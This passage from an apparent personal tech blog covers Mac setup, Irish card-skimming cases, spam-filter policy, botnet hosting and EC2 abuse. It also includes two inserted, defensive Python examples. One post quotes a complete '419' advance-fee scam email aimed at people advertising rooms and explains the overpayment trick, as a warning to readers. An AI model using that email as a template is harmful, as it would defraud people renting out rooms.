Up in the top left corner of "international" MacBook keyboards, there's a useless key with a "+-" and double-S symbol on it. I don't think I've ever typed those symbols in my entire life. I want a ~ there, since that's where the ~ key lives, but for some reason, MacOS doesn't include keyboard-remapping functionality to the same level as X11's wonderful "xmodmap". It seems this third-party app might allow me to do that, or maybe something called 'KeyRemap4Macbook'?

This Tao Of Mac HOWTO seems helpful on how to support the "Home"/"End" keys, for external keyboard use.

Focus Follows Mouse

This is a frequent complaint among UNIX-to-Mac switchers. It seems that some apps do a hacky version of it, but then you've got this inconsistent thing where you lose track of which apps will automatically pick up focus (Terminal, iTerm) and which ones need a click first (Firefox, indeed everything else). Unfortunately, it seems an app called CodeTek VirtualDesktop would have fixed it, but seems to have been abandoned. :(

Programmable Hotkeys

I use a few hotkeys to do quick window-control actions without involving the mouse; in particular, F1 brings a window to the front, F2 pushes it to the back, F12 minimizes a window, Ctrl-Alt-LeftArrow moves a window half a screen left, and Ctrl-Alt-RightArrow moves a window half a screen to the right. Those are pretty simple, but effective.

This collection of Applescript files, in conjunction with Quicksilver, look like I may be able to do something similar on the Mac. Here's hoping. LifeHacker suggests that the default for minimize is Cmd-M, so that's what I need to remap from, at least...

This is a big issue -- Dan Kulp had a lot of hot-key-related woes, and wound up going back to Linux as a result. Evan reported the same. I like the idea of MacOS, but my tendonitis-afflicted wrists need their little shortcuts; I'm not willing to compromise on avoiding mouse usage in this way.

(by the way, in order to get F1/F2/F12 back, check the "Use the F1-F12 keys to control software features" box in the Keyboard control panel. Thanks to this page for that tip; it has a few other good tips for UNIX switchers, too.)

Upgrades and Software

So, there's two main contenders for the "apt-get for Mac" throne -- Fink vs MacPorts. Fink takes the Debian approach of downloading binary packages, while MacPorts compiles them from source, BSD/Gentoo-style, on your machine. Since I'm not looking at the source, or picking build parameters, or auditing the code for security issues there and then, I don't see the need to build it -- Fink wins.

One thing though -- the installer for Fink informed me that I needed to run "Repair Permissions", which took a while, and found some things that had somehow already been modified from their system defaults, I'm not sure why. This left me slightly mystified. I then was later told that this is now considered 'voodoo'. wtf.

Mind you, Daring Fireball suggests that the Mac software updates are so poorly implemented that they require essentially rebooting in single-user mode, which sounds frankly terrifying. I hope that's not the case.

BTW, it's worth noting that IMO, AWN is as nice as -- possibly nicer than -- the Dock. ;)

Anyway, that's post #1 in a series. Let's see how I get on from here. (thanks to Aman, Craig and Paddy for various tips so far!)

AWS event in Dublin’s Digital Hub

Brian Scanlan mailed me with this blurb, worth blogging for any AWS users in the Dublin area:

  • Are you a software developer or IT professional working in the Dublin area?

  • Would you like to learn more about Amazon Web Services?

Amazon spent over ten years developing a world-class technology and content platform that powers Amazon web sites for millions of customers daily. Most people think "Amazon.com" when they hear the word; however developers are excited to learn that there is a separate arm of the company, known as Amazon Web Services or AWS.

Using AWS, developers can build software applications leveraging the same robust, scalable and reliable technology that powers Amazon's retail business.

Amazon Data Services Ireland are delighted to welcome Simone Brunozzi (simoneb at amazon.com), AWS Evangelist for Europe, to Dublin, where he will give an overview of Amazon Web Services, including S3, EC2 and EBS, SimpleDB and more.

Tuesday 16th September 2008 at 7pm, The Digital Exchange Auditorium, Crane Street, Dublin 8

Maps and directions to the venue are here. Refreshments will be served.

All welcome - but places are limited, so please sign-up by mailing aws-dublin-event at amazon.com before Thursday 11th September.

I have no connection to this; not even sure if I'll be going, as I went to the last one anyway and it was a bit short on technical tips ;) . But worth blogging anyway.

Another POS skimming fraud in Galway

This is a little late, since I was off on holliers when it came to light -- Galway News reports 'hundreds hit by skimming scam':

The account details of shoppers who used credit or laser cards to pay for their groceries and other items in a number of Galway shops and supermarkets were illegally skimmed by a gang who apparently managed to interfere with the Chip & PIN terminals at the stores’ check-out counters.

The Irish Times story:

However, it has emerged some cardholders had several thousand euro taken from their accounts overseas before they realised what was happening and alerted their card provider. And it is feared that thousands of other customers do not yet realise their cards have been cloned. Garda sources have confirmed the case involves thousands of cards.

The Galway investigation is centred on one large shop in the county. Gardaí believe several thousand cards have had all of their details skimmed, including pin numbers, over the past month. Some of the cards have already been cloned and used in Canada and other countries where, unlike Ireland, chip and pin protective technology is not in use.

In the Galway case [...] Detectives are working on the theory that somebody in the Galway shop may have facilitated the card skimming for an Eastern European crime syndicate.

Gardaí do not believe the payment terminals were tampered with. Gardaí have recovered CCTV images of suspects from in-store cameras.

In the past, cards have been copied using very small hand held devices through which a card is quickly and discreetly skimmed at the point of payment. The information is then copied, or cloned, onto a blank card which is then used like a regular payment card.

Skimming devices around the size of a cigarette lighter can store details from thousands of cards.

The payment terminals from the Galway shop have been taken by gardaí for technical examination as a precaution. The Garda Bureau of Fraud Investigation is leading the inquiry.

This Boards.IE thread is a real eye-opener, containing lots of reports from victims of this scam -- many reports saying that they suspect it was in Joyces' Supermarket in Knocknacarra, although one poster reckons 'there are now over 20 suspect premises in Galway City and outskirts'. blimey.

On a related note -- while shopping in my local supermarket at the weekend, I was pleased to note that when I paid with my credit card, I was asked to sign the slip, instead of using Chip-and-PIN. So it looks like at least one retailer is taking additional care.

On the other hand, the thread also notes many cases of skimming which took place from in-store ATMs in small convenience stores -- those are very widespread now. eek. :(

GoDaddy’s spam filter is broken

GoDaddy is rejecting mail with URLs that appear in the Spamhaus PBL. As this thread on the Amazon EC2 forum notes, this is creating false positives, causing nonspam mail to be rejected. Here's what GoDaddy reportedly said about this policy:

Unfortunately, our system is set to reject mails sent from or including links listed in the SBL, PBL or XBL. Because the IP address associated to [REMOVED] is listed in the PBL, any emails containing a link to this site will be rejected. This includes plain-text emails including this information.

If this is true, it's utterly broken.

Spamhaus explicitly warn that this is not to be done, on the PBL page:

Do not use PBL in filters that do any ‘deep parsing’ of Received headers, or for other than checking IP addresses that hand off to your mailservers.

And more explicitly in the Spamhaus PBL FAQ:

PBL should not be used for URI-based blocking! Consider the false positive potential: legitimate webservers hosted with services such as dyndns.com or ath.cx! Or consider that ISPs and other networks are encouraged to list any IP ranges which should not send mail, and that could include web servers! Use SBL or XBL (or sbl-xbl.spamhaus.org) for URI blocking as described in our Effective Spam Filtering section. Use PBL only for SMTP (mail).

Critically, the PBL now lists all Amazon EC2 space, since Spamhaus interpret Amazon's policy as forbidding email to be delivered via direct SMTP from there. (Note -- email, not HTTP.)

With this filter in place at GoDaddy, that now means that if you mail a URL of any page on any site hosted at EC2 to a user of GoDaddy, your mail won't get through.

Note: this is much worse than blocks of SMTP traffic from EC2. In that case, an EC2 user can relay their legit SMTP traffic via an off-EC2 host. In this case, there is no similar option in HTTP that isn't insufferably kludgy. :(
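The distinction Spamhaus draws above, as an added example (not code from GoDaddy, Spamhaus or this post): the connecting client IP may be checked against SBL, XBL and PBL, while hosts behind URLs in the body are checked against SBL and XBL only. The combined zone name `zen.spamhaus.org`, its `127.0.0.x` return codes, the function names and the sample addresses are assumptions; the lookup table is constructed so the block runs offline.

```python
import ipaddress
import socket

ZONE = "zen.spamhaus.org"  # assumption: combined SBL+XBL+PBL zone, not named on the page

SMTP_LISTS = {"SBL", "XBL", "PBL"}  # for the IP that hands mail to our server
URI_LISTS = {"SBL", "XBL"}          # for hosts of URLs in the body: never PBL


def dnsbl_qname(ip, zone=ZONE):
    """192.0.2.10 -> 10.2.0.192.zen.spamhaus.org (IPv4 only here)."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def lists_for(answers):
    """Map the A records of a DNSBL answer to the component lists they name."""
    found = set()
    for answer in answers:
        net, _, last = answer.rpartition(".")
        if net != "127.0.0":
            continue  # e.g. 127.255.255.x are resolver error codes, not listings
        code = int(last)
        if code in (2, 3):
            found.add("SBL")
        elif 4 <= code <= 7:
            found.add("XBL")
        elif code in (10, 11):
            found.add("PBL")
    return found


def dns_lookup(qname):
    """Live resolver; NXDOMAIN (or any resolver failure) is treated as unlisted."""
    try:
        return socket.gethostbyname_ex(qname)[2]
    except OSError:
        return []


def verdict(client_ip, uri_host_ips, lookup=dns_lookup, uri_lists=URI_LISTS):
    """Return (action, reason) for one message."""
    hits = lists_for(lookup(dnsbl_qname(client_ip))) & SMTP_LISTS
    if hits:
        return ("reject", "client %s in %s" % (client_ip, ",".join(sorted(hits))))
    for ip in uri_host_ips:
        hits = lists_for(lookup(dnsbl_qname(ip))) & uri_lists
        if hits:
            return ("reject", "URI host %s in %s" % (ip, ",".join(sorted(hits))))
    return ("accept", "")


# Constructed sample data (documentation address ranges, not real listings).
RELAY = "198.51.100.7"            # unlisted mail relay
DYNAMIC_CLIENT = "203.0.113.99"   # end-user range, PBL-listed
WEB_ON_PBL = "203.0.113.20"       # legitimate web server inside a PBL-listed range
WEB_ON_SBL = "192.0.2.66"         # spam-advertised web server, SBL-listed

FAKE_ZONE = {
    dnsbl_qname(DYNAMIC_CLIENT): ["127.0.0.10"],
    dnsbl_qname(WEB_ON_PBL): ["127.0.0.11"],
    dnsbl_qname(WEB_ON_SBL): ["127.0.0.2"],
}


def fake_lookup(qname):
    return FAKE_ZONE.get(qname, [])


if __name__ == "__main__":
    # Policy described in the GoDaddy reply: PBL applied to URL hosts too.
    print(verdict(RELAY, [WEB_ON_PBL], fake_lookup, uri_lists=SMTP_LISTS))
    # Policy Spamhaus documents: PBL for the SMTP client only.
    print(verdict(RELAY, [WEB_ON_PBL], fake_lookup))
    print(verdict(RELAY, [WEB_ON_SBL], fake_lookup))
    print(verdict(DYNAMIC_CLIENT, [], fake_lookup))
```
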

The real reason cycling is such a pain in Dublin

Cian Ginty at the Irish Times writes:

As clunky helmets, yellow reflective gear, and Lycra could be used as a stereotype for Irish cyclists, it might come as a surprise that women wearing high heels are a common sight on bicycles in Copenhagen.

The general image of cycling here is vastly different to so-called bicycle cultures where cycling is normalised and there is talk of a "slow bicycle movement".

"Among thousands and thousands of cyclists on my daily routes, I think I see one or two reflective vests a week, if that," says Mikael Colville-Andersen, a cycling advocate living in Copenhagen.

With Denmark, the Netherlands and Germany - where bicycle usage is high - the helmets and reflective clothing we think of as "a must" for cyclists are far from standard.

It then goes on to rehash some of the stuff that has cropped up recently on cycling blogs about cycling safety, helmets, etc.

The only problem with casualization of cycling, removing gear like helmets, is that without corresponding changes to the road and cycleways to make them safer, it will increase accidents and fatalities. I looked this up a couple of weeks back when I came across an anti-helmet site. Chasing up the figures and doing some research, it became clear that if you simply want to cycle without hurting yourself, the facts were not on their side -- helmets save lives, especially when dealing with shared roadways as we have here.

Copenhagenization is a result of a better, safer road environment for cyclists, as seen in Denmark and the Netherlands, which makes safety gear not as much of a requirement. But on the other hand, Ireland's roads are designed mainly for cars, and Dublin Council have done little to help -- that makes safety gear a requirement, unfortunately :(

However, I think this is the real reason why people don't cycle in Dublin:

Let's take a fictional person, let's call her Kassandra. Kassandra lives a little north of Copenhagen and rides to work every day between 07:25 and 07:55 and back again between 15:35 and 16:05. Kassandra doesn't mind a little light showers, but if the intensity increases to over 0.4 mm over 30 minutes (light rain), then she thinks it is too wet. Kassandra works five days a week and has weekends and holidays free. That gives her 498 trips between September 2002 and the end of August 2003.

How often does Kassandra get wet either to or from her job that year? The answer is, in fact, rarely. On those 498 trips it was only 17 times. That is only 3.5% or on average 1.5 trips a month.

3.5%. Compare that with what's happened in Dublin this month -- I'd estimate that's meant that at least half of my rides have involved some degree of rainfall, occasioning many cries of woe.

It takes dedication -- and lots of wet-weather gear -- to ride a bike here...

(Of course, having said that, I look out the window and it's immediately sunny ;)

Update: Ryan Meade corrects me in the comments:

Justin, you need to take a look at Owen Keegan’s paper to Velo-City 2005, “Weather and Cycling in Dublin : Perceptions and Reality”. The probability of getting wet is actually pretty comparable to the Copenhagen scenario detailed above - 5.5% for a 30 minute journey if you take 0.2mm per hour at the threshold for “getting wet”. On the other hand the vast majority of both cyclists and motorists think it’s more than 15%, with half thinking it’s above 30%.

Amazing how the psychological, "glass half-empty" factor influences my thinking on this. I had no idea!

How tightly linked are the top spam botnets?

I was away on holidays last week, and when I got back, I found my feed reader full of some good discussion as to whether today's bigger spam botnets -- Srizbi, Rustock, Mega-D, Cutwail/Pushdo -- are sharing components, such as "landing" sites, exploits, customers, and even command and control networks. It started with this post on the FireEye Malware Intelligence Lab's blog noting:

'Some malware researchers have described Srizbi and Rustock as rival botnets, our data indicates that this apparent rivalry is a sibling rivalry at best. Srizbi and Rustock seem to be supported (controlled) by the same parent (bot herder).'

and in this followup:

'We can clearly see that Srizbi, Pushdo and Rustock are using same ISP, and in many cases, IPs on the same subnet to host their Command and Control servers. It seems extremely unlikely to our research team that three previously "rival" Botnets would share nearly consecutive IP space, and be hosted in the same physical facility. Of all the data centers and IPs in the world, the fact that they are all on the same subnet is very intriguing. This fact makes the FireEye research team conclude that either the Botnets are operated by the same organization, or that the datacenter (McColo) is a shell corporation that leases out its IP space and bandwidth for nefarious actions.' [...]

'IPs at a typical datacenter are leased out in a /30 or more commonly, a /29 block. However, here we can see that in a given succession of IPs, the three Botnets have C&C servers dispersed throughout. This gives us an impression that same Bot herder leased out a larger range and then distributed it amongst its different Botnets.'

Marshal say: 'at the very least, the major botnets have common customers.'

Dark Reading cover it like so:

Rustock, which recently edged Srizbi for the top slot as the biggest spammer mostly due to a wave of fake Olympics and CNN news spam, and Srizbi, known for fake video and DVD spam, have been using the same Trojan, Trojan.Exchanger, to download their bot malware updates, researchers say. “This is the first time” we had seen this connection between the two botnets, says Fengmin Gong, chief security content officer for anti-botnet software firm FireEye. “That’s why when we saw it, it was surprising. They definitely have a relationship,” he says. “There’s not the rivalry we used to think about.” [...]

Joe Stewart, director of security research for SecureWorks, says the Srizbi-Rustock connection is most likely due to a spammer using both zombie networks -- not that the operators of the two botnets are actually collaborating. “What is confusing people is that you’re seeing Rustock bots sending out emails that essentially infect people with Srizbi, so they think it must be Srizbi that’s sending it, but it’s not,” he says. “Srizbi is not just one big model. It’s rented out to lots of different spammers.”

A major spammer may be trying to diversify by using the two botnets, he says. “It could be because they want to separate their malware-seeding operation from their spamming operation,” Stewart says. “Maybe their bots are getting blacklisted faster when they’re sending out URLs with fake video files because they’re easy to spot, so their spam doesn’t get through. So they send malware from this botnet, and spam from this one, to keep out of the blacklists longer.”

I agree that Joe's scenario is very likely; the spammers aren't always the same people who operate the botnets, and it only makes sense that some of them would spread their business among multiple nets, to minimize the risk that all of their output would be blocked if one 'net runs into trouble (or indeed, good filtering ;). But seeing C&C servers sharing LANs also strikes me as unusual. One to watch.
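The address-space argument quoted above can be checked mechanically once C&C sightings are tagged by family. This is an added example, not FireEye's tooling or code from this post: it groups sightings by lease-sized block (/29 or /30) and counts how often the family changes across consecutive addresses in an enclosing /24. The addresses are constructed from documentation ranges and the function names are hypothetical.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: (address, family). Documentation ranges, not real C&C data.
SAMPLE = [
    ("192.0.2.17", "Srizbi"),
    ("192.0.2.18", "Rustock"),
    ("192.0.2.19", "Srizbi"),
    ("192.0.2.21", "Pushdo"),
    ("192.0.2.22", "Rustock"),
    ("192.0.2.130", "Srizbi"),
    ("192.0.2.131", "Srizbi"),
    ("198.51.100.9", "Mega-D"),
]


def enclosing(addr, prefixlen):
    """Network of the given size that contains addr."""
    return ipaddress.ip_network("%s/%d" % (addr, prefixlen), strict=False)


def shared_blocks(observations, prefixlen=29):
    """Blocks of one typical lease size that host C&C for more than one family.

    A single customer normally holds a whole /29 or /30, so several families
    inside one block point at a common lessee (or a complicit host).
    """
    blocks = defaultdict(set)
    for addr, family in observations:
        blocks[enclosing(addr, prefixlen)].add(family)
    return {str(net): sorted(fams) for net, fams in blocks.items() if len(fams) > 1}


def family_switches(observations, prefixlen=24):
    """Per enclosing network, how often the family changes in address order.

    Separate tenants would give long runs of one family; a high switch count
    means the families are interleaved through the range.
    """
    by_net = defaultdict(list)
    for addr, family in observations:
        by_net[enclosing(addr, prefixlen)].append((int(ipaddress.ip_address(addr)), family))
    result = {}
    for net, rows in by_net.items():
        families = [fam for _, fam in sorted(rows)]
        result[str(net)] = sum(1 for a, b in zip(families, families[1:]) if a != b)
    return result


if __name__ == "__main__":
    print(shared_blocks(SAMPLE, 29))
    print(shared_blocks(SAMPLE, 30))
    print(family_switches(SAMPLE, 24))
```
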

Anyway, it's good to see that the malware research blogs are now actively tracking and posting updates when the botnets change topics and format; this info is very valuable for us in anti-spam, as it allows us to map from the received spam mails back to the sending botnet, and determine which rules are good at detecting each botnet. Thanks, guys.

(image credit: cobalt123, used under CC license)

My Omnivore’s 100

Here's my results for The Omnivore's Hundred, a silly foodie "purity test". Bold are items I've eaten; crossed-out items are ones I wouldn't eat again. I score 70 out of 100, and clearly need to eat less Asian and more European cuisine ;)

  1. Venison
  2. Nettle tea
  3. Huevos rancheros
  4. Steak tartare
  5. Crocodile
  6. Black pudding
  7. Cheese fondue
  8. Carp
  9. Borscht
  10. Baba ghanoush
  11. Calamari
  12. Pho
  13. PB&J sandwich
  14. Aloo gobi
  15. Hot dog from a street cart
  16. Epoisses
  17. Black truffle
  18. Fruit wine made from something other than grapes
  19. Steamed pork buns
  20. Pistachio ice cream
  21. Heirloom tomatoes
  22. Fresh wild berries
  23. Foie gras
  24. Rice and beans
  25. Brawn, or head cheese
  26. Raw Scotch Bonnet pepper
  27. Dulce de leche
  28. Oysters
  29. Baklava
  30. Bagna cauda
  31. Wasabi peas
  32. Clam chowder in a sourdough bowl
  33. Salted lassi
  34. Sauerkraut
  35. Root beer float
  36. Cognac with a fat cigar
  37. Clotted cream tea
  38. Vodka jelly
  39. Gumbo
  40. Oxtail
  41. Curried goat
  42. Whole insects
  43. Phaal
  44. Goat's milk
  45. Malt whisky from a bottle worth $120 or more
  46. Fugu
  47. Chicken tikka masala
  48. Eel
  49. Krispy Kreme original glazed doughnut
  50. Sea urchin
  51. Prickly pear
  52. Umeboshi
  53. Abalone
  54. Paneer
  55. McDonald's Big Mac Meal
  56. Spaetzle
  57. Dirty gin martini
  58. Beer above 8% ABV
  59. Poutine
  60. Carob chips
  61. S'mores
  62. Sweetbreads
  63. Kaolin
  64. Currywurst
  65. Durian
  66. Frog's Legs
  67. Beignets, churros, elephant ears or funnel cake
  68. Haggis
  69. Fried plantain
  70. Chitterlings or andouillette
  71. Gazpacho
  72. Caviar and blini
  73. Louche absinthe
  74. Gjetost or brunost
  75. Roadkill
  76. Baijiu
  77. Hostess Fruit Pie
  78. Snail
  79. Lapsang souchong
  80. Bellini
  81. Tom yum
  82. Eggs Benedict
  83. Pocky
  84. Tasting menu at a three-Michelin-star restaurant
  85. Kobe beef
  86. Hare
  87. Goulash
  88. Flowers
  89. Horse
  90. Criollo chocolate
  91. Spam
  92. Soft shell crab
  93. Rose harissa
  94. Catfish
  95. Mole poblano
  96. Bagel and lox
  97. Lobster Thermidor
  98. Polenta
  99. Jamaican Blue Mountain coffee
  100. Snake

(thanks to this generator and mordaxus at Emergent Chaos for the link.)

Irish gang skims 20,000 bank cards through retail POS terminals

Wow, this is pretty massive. The Irish Payment Services Organisation has again released details of a credit-card breach, this time on retail Point-of-Sale card terminals. Quoting the Irish Examiner story:

Una Dillon, head of card services at the Irish Payment Services Organisation, said the criminals went into the shops pretending to be doing maintenance work on behalf of the banks.

“We have discovered only in the last 48 hours that a number of retailers have been affected by a point-of-sale compromise,” she said. “We are in the lucky position that it was discovered quickly and the gardaí are working on it.

“Gardaí have uncovered a lot of the devices and CCTV footage. We have a list of all the card numbers that have been used. They have either been blocked or restrictions put on those cards.

“With the devices recovered it may just be that the cards were only saved and the criminals did not have a chance to get hold of the card numbers.”

“There will be an emergency meeting today with the gardaí, the terminal vendors and the banks to try and close down on this,” she said, adding the gardaí were in pursuit of the gang.

Insufficient authentication of maintenance staff is being blamed:

“The criminals have been going into shops claiming to be engineers working on the terminals. Staff are used to their bank officials coming to update terminals so unfortunately they have been able to do that.

Bank of Ireland estimated 3,100 of its debit and credit cards were affected and Ms Dillon said the other eight card providers could have similar numbers.

Bank of Ireland said, as a temporary measure, it had reduced the daily withdrawal limit on all its debit cards for ATM transactions outside Ireland to just €100 to protect customers from fraud.

They haven't released the names of the affected shops yet; 20,000 cards, though, sounds like it's been going on for a while, on a large scale. Yikes.

The SiliconRepublic story claims that the gang 'plugged in wireless devices that pushed the data to the internet and allowed the card numbers to be used overseas.' However, in the past, these 'wireless devices' didn't use the internet; instead they use parts from mobile phones, which relayed PINs, card numbers and CVV security codes via SMS text messages to Romania. That model seems more likely here, I would guess, due to the reliability of phone networks.

Update: last night's RTE Six-One news bulletin (viewable as streaming RealVideo or transcoded 5MB AVI file), made it clear that the hardware used phone components and SMS. It had some pretty good pics of what appears to be a sample subverted POS terminal:

VISA have been warning about attacks on petrol-pump-based POS terminals since 2006, e.g. this story, but they're easier to attack since there's few or no staff present by the pumps when the POS terminal subversion takes place. This has resulted in most petrol stations in Ireland disabling POS credit-card payment systems, requiring customers to pay at the counter; we lose convenience, but at least we're probably not being skimmed. But these in-store POS terminals seem to be increasingly under attack; there are reports from Livigno, Italy, Rhode Island, and Canada.

The tamper-proofing of POS terminal hardware is unreliable; it'd be nice to see them made harder to tamper with. I would guess the gang used secondhand, hacked POS terminals, which supposedly should be tamper-evident (ie. easy to spot modifications).

Better yet, if Chip-and-PIN cards used end-to-end crypto between a crypto smartcard and the bank's central systems, POS hacks would be impossible. But there's no sign of that happening.

Most importantly, IPSO has promised that 'banks will refund any customers whose details have been used to make fraudulent transactions.' That's key. It's interesting to note that IPSO have been hammering home this point repeatedly in their stories -- they're worried about customer confidence, I'd guess.

On Threading

Luis Villa, in a post to FoRK:

I have found that [mail] threading is overrated, in part because I've realized that any conversation so baroque as to actually require threading probably isn't worth following.

Even though I wrote a threader for MH, I have to admit by now that he has a point ;)

AppEngine — only useful for toys

Noted on Twitter:

simonw: So apparently http://www.news.com.au/ used json-time for their Beijing countdown widget and blew my App Engine quota! They've stopped now.

uh, great. That's useful.

Google -- how are we supposed to host useful services with those limits?

Aaaand we’re back

Due to unfortunate scheduling, taint.org had some downtime there as it moved to a new server. It's back now though.

Some of the other services running on taint.org, jmason.org, yerp.org, twit.ie, planet.spam.abuse.net and so on, are still intermittently offline as I bring them back up in their new home... so have patience, they'll be back soon. ;)

Neocon search terms

I'm back from a week in Cornwall. I'd like to say I was rested, but chasing after an 11-month-old baby in a caravan isn't all that restful. Still, it was sunny, and good for a change of pace ;)

Via b1ff.org, here's the Nexis search that US Department of Justice White House liaisons ran on job candidates to determine their political leanings:

[first name of a candidate] and pre/2 [last name of a candidate] w/7 bush or gore or republican! or democrat! or charg! or accus! or criticiz! or blam! or defend! or iran contra or clinton or spotted owl or florida recount or sex! or controvers! or racis! or fraud! or investigat! or bankrupt! or layoff! or downsiz! or PNTR or NAFTA or outsourc! or indict! or enron or kerry or iraq or wmd! or arrest! or intox! or fired or sex! or racis! or intox! or slur! or arrest! or fired or controvers! or abortion! or gay! or homosexual! or gun! or firearm!

This Nexis reference says the "w/n" keyword searches for 'words .. within 5 or 10 words of each other, Ex: "Enron w/5 investigation"'.

This is just a smidgen away from the concept of a SpamAssassin-style scoring filter. Crazy stuff.

Best of all, it's buggy and over-sensitive, according to one librarian: 'If that is really their search string, they were going through 99% unrelated citations. There need to be a very nested set of parentheses to make the terms work, starting with one after the w/7. Fired and sex are OR’ed twice and need to be nested, at least in the case of Fired and the OR’d terms immediately following.'

Update: good Slashdot comment thread here. This comment indicates that the above librarian might be off-base regarding the w/7 parentheses, since the OR operator has higher priority. Here is an even better walkthrough of the query statement logic. Finally, here's an explanation of the "spotted owl" curiosity...

“Roommate” 419 Scam

Here's an interesting form of advance fee fraud I hadn't heard of before; it's a good example of 419 scammers ruining yet another casual online marketplace.

Let's say you have a room you want to rent. You put up a "housemate wanted" ad on Craigslist or wherever. Here's the reply you'll get:

Hi There,

How re you doing? I hope all is well. I'm martha Robot , am 26 yrs old and Am originally from chester united Kingdom . Graduate of I have a master degree in fashion design and I work as a professional fashion designer. I'm am not in the united kingdom right now, i am presently in West africa . I am currently working on contract for a company call (African Family Home Fashions) here in West Africa which the contract will be ending soon. I will be returning to your place soon. I enjoy traveling, It is very interesting to get more knowledge about the new countries, new people and traditions. It's great to have such a possibility. As i was searching through the web i saw the advert of your place . I would like to know maybe it's still available becasue i'm extremely interested in it. Here are the questions i would like to know about the room before planing to move in to the following questions below:

A}I will like to know the major intersection nearest your neighbourhood.like shopping mall,Churches,bus line e.t.c

B}I will like to know the total cost for the my initial move as in first month rent and if you accept deposit.

C}I will like to know if there is any garage or parking space cos I will have my own car come over.

D}I will like to have the rent fee per month plus the utilities.

E}I will like to have the description of the place, size, and the equipments in there.

F}I will also like to know Your payment mode.

G}I will like to know if I can make an advance payment ahead my arrival that will be stand as a kind of commitment that I am truely coming over and for you to hold the place down for me.

I will be very glad to have all this questions answered with out leaving a stone unturned...You can Call my Landlord for more references in UK ..+447024046815.

Email me back:

Thanks. Martha.

Needless to say, this is a scam. Here's how it works (courtesy of this post): The interested "applicant" will send a cashier's check or money order for the deposit, the value of which greatly exceeds the actual amount requested. They will then claim the overpayment to be an honest error based on their confusion about how these things work, and ask the victim to send back a money order refunding that amount, or to send it on to a "travel agent" who is supposedly booking the scammer's flight. The payment will be made via a non-refundable mechanism like the 419er's favourite, Western Union. It will be a matter of great urgency, as they will claim to need the funds to make the trip over. Her money order will clear, theirs will not -- and there's no way to refund the payment, so it's gone. This is a classic advance-fee fraud trick, it seems.

Got to love that nom de plume, though -- "Martha Robot". GREE-TINGS MAR-THA RO-BOT!

Googling for 'major intersection nearest your neighbourhood' churches bus finds plenty more:

Finally, a Washington-based realtor has written up a good walkthrough of the scam. He notes:

I recently ran an ad on craigslist.com to see if they were still working it. Craigslist has posted many warnings against responding to such solicitations and I was curious if the scammers had moved on to more fertile ground. They have not; I received 16 such inquiries in one day to a simple ad offering a room for rent in Bellevue. I used a fictitious identity and a newly created email address. I'll use the emails from just one of them as an example. This particular scammer managed to have a check on my doorstep by the next day!

(thanks to nimbus9 for the headsup)

Amazon EC2’s spam and malware problems

Over the past few weeks, I've increasingly heard of spam and abuse problems originating in Amazon EC2.

This has culminated in a blog post yesterday by Brian Krebs at the Washington Post:

It took me by surprise this weekend to discover that mounds of porn spam and junk e-mail laced with computer viruses are actively being blasted from digital real estate leased to [Amazon].

He goes on to discuss how EC2 space is now actively blocked by Outblaze, and has been listed by Spamhaus in their PBL list. A spokesperson for Amazon said:

"We have a clear acceptable use policy and whenever we have received a complaint of spam or malware coming through Amazon EC2, we have moved swiftly to strictly enforce the use policy by network isolating (or even terminating) any offending instances," Kinton said. She added that Amazon has since taken action against the EC2 systems hosting the [malware].

However as Seth Breidbart noted in the comments, 'note that Amazon will terminate the instance. That means that the spammer just creates another instance, which gets a new IP address, and continues spamming.' True enough -- as described, instance termination simply isn't good enough.

My recommendations:

  • as John Levine noted, it's likely that Amazon need to treat EC2-originated traffic similarly to how an ISP treats their DSL pools -- filtering outbound traffic for nastiness, in particular rate-limiting port 25/tcp connections on a per-customer basis, so that an instance run by (or infiltrated by) a spammer cannot produce massive quantities of spam before it is detected and cut off.

    However, I'm not talking about blocking port 25/tcp outbound entirely. That's not appropriate -- an EC2 instance is analogous to a leased colo box in a server farm, and not being able to send mail from our instances would really suck for EC2 users (like myself and my employers).

  • It would help if there were a way to look up customer IDs from the IP address of the EC2 nodes they're using -- either via WHOIS or through rDNS. Even an opaque customer ID string would allow anti-abuse teams to correlate a single customer's activity as they cycle through EC2 instances. This would allow those teams to deal with the reputation of Amazon's customers, instead of Amazon's own rep, analogous to how "traditional" hosters use SWIP to publicize their reassignments of IPs between their customers.

There's some more discussion buried in a load of knee-jerking on the NANOG thread. Here's a few good snippets:

Jon Lewis: 'I got the impression the only thing Amazon considers abuse is use of their servers and not paying the bill. If you're a paying customer, you can do whatever you like.' (ouch.)

Ken Simpson: 'IMHO, Amazon will eventually be forced to bifurcate their EC2 IP space into a section that is for "newbies" and a section for established customers. The newbie space will be widely black-listed, but will also have a lower rate of abuse complaint enforcement. The only scalable way to deal with a system like EC2 is to provide clear demarcations of where the crap is likely to originate from.'

Bill Herrin: 'From an address-reputation perspective EC2 is no different than, say, China. Connections from China start life much closer to my filtering threshold than connections from Europe because a far lower percentage of the connections from China are legitimate. EC2 will get the same treatment.'

There's also an earlier thread here.

Anyway, this issue is on fire -- Amazon need to get the finger out and deal with it quickly and effectively, before EC2 does start to run into widespread blocks. I'm already planning migration of our mail-sending components off of EC2; we're already seeing blocks of mail sent from it, and it's looking likely that these will increase. :(

(It's worth noting that a block of EC2's netblocks today will produce a load of false positives, mainly on transactional mail, if you're contemplating it. So I wouldn't recommend it. But a lot of sites are willing to accept a few FPs, it seems.)

Hack: twitter_no_popups.user.js

Twitter has this nasty habit -- if you come across a tweet in your feed reader containing a URL, and you want to follow that link, you can't, because Twitter doesn't auto-link URLs in its RSS feeds. Instead, you have to click on the feed item, itself, wait for that to open in the browser, then click on the link in the new browser tab. That link will, in turn, open in another new tab.

Here's a quick-hack Greasemonkey user script to inhibit this second new-tab:

twitter_no_popups.user.js

How To Eat a Mangosteen

'You'll know what my riddle means
When you've eaten mangosteens.'
-- The Crab That Played with the Sea, by Rudyard Kipling

When I travelled through Thailand, I got rightly hooked on the delicious mangosteen, traditionally dubbed the "Queen of Fruit" by the Thais. I've been keeping an eye out ever since, through our travels to the US and back, without any luck. (In particular, they've been blocked by US customs for a long time, although reportedly this is changing nowadays.)

Finally, last year, they appeared in our local Tesco supermarket here in Ireland -- or at least, an empty box appeared, sans fruit! That was it, though, until a couple of weeks ago, when my friend Bob was lucky enough to come across a few, and grabbed 4 for me. (Thanks Bob!)

It appears they're in season around the start of June, which is when they make it to Tesco's. Naturally, they're much more expensive here -- Tesco were selling them for about EUR 1.20 each, whereas a bag of 30 were about 50 cents when we used to buy them at the street-side in Ko Chang. But that's to be expected, really.

